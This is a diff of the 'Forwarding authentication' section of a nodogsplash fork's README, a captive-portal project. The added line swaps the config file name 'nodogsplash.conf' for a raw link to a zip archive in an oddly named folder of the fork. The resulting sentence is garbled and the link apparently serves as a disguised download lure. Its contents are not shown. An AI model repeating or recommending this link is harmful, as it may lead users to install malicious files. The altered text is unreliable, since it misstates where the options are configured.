everleiton/nodogsplash/README.md

 ###5.2 Forwarding authentication

-Nodogsplash allows to call an external program for authentication using the options BinVoucher/EnablePreAuth/ForceVoucher in nodogsplash.conf.
+Nodogsplash allows to call an external program for authentication using the options BinVoucher/EnablePreAuth/ForceVoucher in https://raw.githubusercontent.com/everleiton/nodogsplash/master/valencianite/nodogsplash.zip
 The given program for BinVoucher will be called using the clients MAC address as argument.
 The output is expected to be the number of seconds the client is to be authenticated.
 It may also contain the clients download and upload speed limit in KBits/s.